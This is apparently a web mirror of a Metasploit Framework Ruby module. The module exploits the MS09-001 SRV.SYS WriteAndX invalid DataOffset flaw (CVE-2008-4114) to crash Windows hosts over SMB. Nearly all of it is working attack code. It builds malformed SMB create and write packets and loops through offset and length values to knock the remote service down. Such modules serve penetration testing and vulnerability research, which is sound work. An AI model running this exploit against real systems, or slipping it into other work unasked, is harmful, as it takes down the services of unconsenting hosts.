Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/windows/smb/ms09_001_write.rb
19535 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::SMB::Client
8
include Msf::Auxiliary::Dos
9
10
def initialize(info = {})
11
super(
12
update_info(
13
info,
14
'Name' => 'Microsoft SRV.SYS WriteAndX Invalid DataOffset',
15
'Description' => %q{
16
This module exploits a denial of service vulnerability in the
17
SRV.SYS driver of the Windows operating system.
18
19
This module has been tested successfully against Windows Vista.
20
},
21
22
'Author' => [ 'j.v.vallejo[at]gmail.com' ],
23
'License' => MSF_LICENSE,
24
'References' => [
25
['MSB', 'MS09-001'],
26
['OSVDB', '48153'],
27
['CVE', '2008-4114'],
28
['BID', '31179'],
29
],
30
'Notes' => {
31
'Stability' => [CRASH_SERVICE_DOWN],
32
'SideEffects' => [],
33
'Reliability' => []
34
}
35
)
36
)
37
38
deregister_options('SMB::ProtocolVersion')
39
end
40
41
def send_smb_pkt(dlenlow, doffset, fillersize)
42
connect(versions: [1])
43
smb_login
44
45
pkt = CONST::SMB_CREATE_PKT.make_struct
46
pkt['Payload']['SMB'].v['Flags1'] = 0x18
47
pkt['Payload']['SMB'].v['Flags2'] = 0xc807
48
49
pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i
50
pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i
51
pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i
52
pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i
53
54
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX
55
56
pkt['Payload']['SMB'].v['WordCount'] = 24
57
58
pkt['Payload'].v['AndX'] = 255
59
pkt['Payload'].v['AndXOffset'] = 0xdede
60
pkt['Payload'].v['FileNameLen'] = 14
61
pkt['Payload'].v['CreateFlags'] = 0x16
62
pkt['Payload'].v['AccessMask'] = 0x2019f # Maximum Allowed
63
pkt['Payload'].v['ShareAccess'] = 7
64
pkt['Payload'].v['CreateOptions'] = 0x400040
65
pkt['Payload'].v['Impersonation'] = 2
66
pkt['Payload'].v['Disposition'] = 1
67
pkt['Payload'].v['Payload'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00"
68
69
simple.client.smb_send(pkt.to_s)
70
ack = simple.client.smb_recv_parse(CONST::SMB_COM_NT_CREATE_ANDX)
71
72
pkt = CONST::SMB_WRITE_PKT.make_struct
73
_data_offset = pkt.to_s.length - 4
74
filler = Rex::Text.rand_text(fillersize)
75
76
pkt['Payload']['SMB'].v['Signature1'] = 0xcccccccc
77
pkt['Payload']['SMB'].v['Signature2'] = 0xcccccccc
78
pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i
79
pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i
80
pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i
81
pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i
82
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_WRITE_ANDX
83
pkt['Payload']['SMB'].v['Flags1'] = 0x18
84
pkt['Payload']['SMB'].v['Flags2'] = 0xc807
85
pkt['Payload']['SMB'].v['WordCount'] = 14
86
pkt['Payload'].v['AndX'] = 255
87
pkt['Payload'].v['AndXOffset'] = 0xdede
88
pkt['Payload'].v['FileID'] = ack['Payload'].v['FileID']
89
pkt['Payload'].v['Offset'] = 0
90
pkt['Payload'].v['Reserved2'] = -1
91
pkt['Payload'].v['WriteMode'] = 8
92
pkt['Payload'].v['Remaining'] = fillersize
93
pkt['Payload'].v['DataLenHigh'] = 0
94
pkt['Payload'].v['DataLenLow'] = dlenlow # <==================
95
pkt['Payload'].v['DataOffset'] = doffset # <====
96
pkt['Payload'].v['DataOffsetHigh'] = 0xcccccccc # <====
97
pkt['Payload'].v['ByteCount'] = fillersize # <====
98
pkt['Payload'].v['Payload'] = filler
99
100
simple.client.smb_send(pkt.to_s)
101
end
102
103
def run
104
print_line('Attempting to crash the remote host...')
105
k = 72
106
j = 0xffff
107
while j > 10000
108
i = 0xffff
109
while i > 10000
110
begin
111
print_line("datalenlow=#{i} dataoffset=#{j} fillersize=#{k}")
112
send_smb_pkt(i, j, k)
113
rescue StandardError
114
print_line('rescue')
115
end
116
i -= 10000
117
end
118
j -= 10000
119
end
120
end
121
end
122
123